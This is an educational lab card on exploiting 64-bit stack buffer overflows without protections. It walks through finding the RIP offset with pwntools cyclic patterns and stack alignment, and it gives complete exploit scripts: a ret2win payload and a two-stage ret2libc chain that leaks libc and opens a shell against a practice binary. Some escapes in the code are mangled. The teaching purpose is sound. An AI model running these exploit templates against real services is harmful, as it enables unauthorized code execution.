Simple Buffer Overflow Without Protections: Return Address Overwrite and Program Flow Redirection

reverse_engineering Difficulty 1–5 30 min certifiable

Theory

Why This Matters

The 64-bit stack buffer overflow is the starting point for the entire ROP/ret2libc exploit class. Even experienced analysts sometimes miscalculate the RIP offset or forget the 16-byte alignment requirement, causing reliable-looking exploits to fail in unexpected ways. NICE K0168 and S0131 require a methodical approach: use cyclic patterns to find the offset precisely, understand the 64-bit stack frame layout, and apply the ret sled alignment trick before calling any libc function that uses SSE instructions. This card consolidates the correct workflow for 64-bit stack overflows without protections.

Core Concept

The x86-64 stack frame at function entry (after push rbp; mov rbp, rsp):

Higher addresses (caller's frame)
  [rbp + 0x08]  saved RIP      <- overwrite target (8 bytes)
  [rbp + 0x00]  saved RBP      <- 8 bytes, corrupted by overflow
  [rbp - 0x08]  local vars...
  [rsp]         (end of frame)
Lower addresses

A buffer at [rbp - N] requires exactly N bytes to fill it, plus 8 bytes for saved RBP, before reaching saved RIP. The total offset from the buffer start to saved RIP is N + 8.

Finding the offset with cyclic: pwntools generates a De Bruijn sequence — every 4-byte substring is unique. Send cyclic(200), trigger the crash, read the 4-byte value at the crash site in RIP (or from the coredump), and cyclic_find() returns the byte offset.

16-byte alignment requirement: x86_64 ABI mandates that RSP is 16-byte aligned at the point of a call instruction. Since call pushes 8 bytes (return address), the stack is then 8-byte aligned at function entry. The standard push rbp adds 8 more bytes, making RSP 16-byte aligned within the callee. When a ROP chain's ret jumps to libc functions that use movaps (SSE aligned moves), RSP must be 16-byte aligned at that ret — i.e., RSP must be 0x...0 or 0x...8 depending on where in the chain we are. The safest fix: prepend a bare ret gadget before any libc call.

Technical Deep-Dive

Step 1 — Find RIP offset with cyclic:

from pwn import *

context.arch = 'amd64'

# Generate cyclic pattern
pattern = cyclic(200)
print(f"Pattern (first 20): {pattern[:20]}")

# Send to binary; it will crash with a specific value in RIP
p = process('./simple_bof')
p.sendline(pattern)
p.wait()

# Method A: use coredump
core = Coredump('./core')
rip_val = core.rip
print(f"RIP at crash: {rip_val:#x}")
offset = cyclic_find(rip_val & 0xffffffff)   # cyclic works on 4-byte substrings
print(f"Offset to saved RIP: {offset}")

# Method B: use GDB
# (gdb) run < <(python3 -c "from pwn import *; sys.stdout.buffer.write(cyclic(200))")
# (gdb) i r rip
# Then: cyclic_find(rip_value)

Step 2 — Verify offset and build payload:

from pwn import *

elf = ELF('./simple_bof')
p   = process('./simple_bof')

offset     = 72          # from cyclic analysis
win_addr   = elf.sym['win']
ret_gadget = 0x40101a    # bare ret for alignment

log.info(f'win() @ {win_addr:#x}')

# Check if win() needs alignment (if it calls any SSE-using libc function internally):
# If win() calls puts(), printf(), etc. -> alignment needed
# If win() just calls system() -> alignment needed
# Add ret_gadget before win_addr to ensure 16-byte alignment

payload  = b'A' * offset
payload += p64(ret_gadget)   # alignment
payload += p64(win_addr)     # jump to win()

p.sendline(payload)
p.interactive()

Step 3 — Determine whether alignment is needed:

# Rule of thumb: if the payload ends with p64(libc_function) directly after p64(pop_rdi),
# the stack alignment at the call is:
#   RSP was offset+8 (8-byte aligned from function ret)
#   Each p64() pushes 8 bytes; after offset/8 gadgets RSP shifts by 8*N
# If offset is divisible by 16: RSP is misaligned (needs one extra ret)
# If offset is not divisible by 16: RSP is aligned (no extra ret needed)
# But this arithmetic is subtle -- always verify in GDB with "p $rsp & 0xf"

# Empirical check in GDB:
# (gdb) break system
# (gdb) run < exploit_input
# (gdb) p $rsp & 0xf
# Should be 0x0 for aligned. If 0x8: add one p64(ret_gadget) to the chain.

Complete 64-bit overflow exploit with full ASLR bypass (linking to other techniques):

from pwn import *

elf  = ELF('./simple_bof')
libc = ELF('./libc.so.6')
p    = process('./simple_bof')

offset     = 72
pop_rdi    = 0x401263
ret_gadget = 0x40101a

# Stage 1: leak libc (ret2libc.v2 technique)
payload1  = b'A' * offset
payload1 += p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
p.sendline(payload1)
leak = u64(p.recvuntil(b'
').strip().ljust(8, b'x00'))
libc.address = leak - libc.sym['puts']
log.info(f'libc base: {libc.address:#x}')

# Stage 2: shell (ret2libc.v2 / one_gadget)
og = libc.address + 0x4f432    # one_gadget with [rsp+0x40]==NULL constraint (example)
payload2  = b'A' * offset
payload2 += p64(ret_gadget)   # alignment
payload2 += p64(og)
p.sendline(payload2)
p.interactive()

Reverse Engineering Methodology

Use cyclic(200) → crash → cyclic_find(rip_val) as the first step every time. Do not guess the offset from the buffer declaration without empirical verification — struct padding and compiler decisions affect the actual layout.
Confirm the offset one more time: send b'A' * offset + b'B' * 8 + b'C' * 8 and verify that RIP = 0x4343434343434343 (CCCCCCCC) and RBP = 0x4242424242424242 in GDB.
Determine alignment: in GDB, break at the target function's entry and check $rsp & 0xf. If it is 8, you are aligned for a call (which would push 8 more bytes making it 0). If the function is reached via ret (not call), RSP alignment after ret depends on the chain.
Search for the bare ret gadget: ROPgadget --binary ./binary --rop | grep ": ret$". It is almost always present at a low address near the PLT stubs or function prologues.

Common Reversing Errors

cyclic_find returning wrong offset on 64-bit: by default cyclic_find searches for a 4-byte substring. On 64-bit, RIP may contain 8 bytes of the cyclic pattern. Use cyclic_find(rip_val & 0xffffffff) to search for the lower 4 bytes, or use cyclic(200, n=8) for 8-byte cyclic patterns.
Forgetting saved RBP in the offset: the layout is [buffer][saved_RBP][saved_RIP]. Cyclic fills buffer AND saved_RBP. The offset to RIP includes the saved RBP slot (8 bytes). cyclic_find gives the offset to the start of the saved RIP slot, not the buffer end.
One-off alignment: inserting one extra ret either fixes or breaks alignment — it shifts RSP by 8. If two ret gadgets are needed, that shifts by 16 (no net effect on alignment). If unsure, try with and without one extra ret and observe in GDB.
Payload delivery truncated: gets() terminates on x0a; fgets(buf, N, stdin) reads at most N-1 bytes. If the payload is longer than the read limit, the extra bytes are not delivered. Verify the total payload length against the read limit.

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.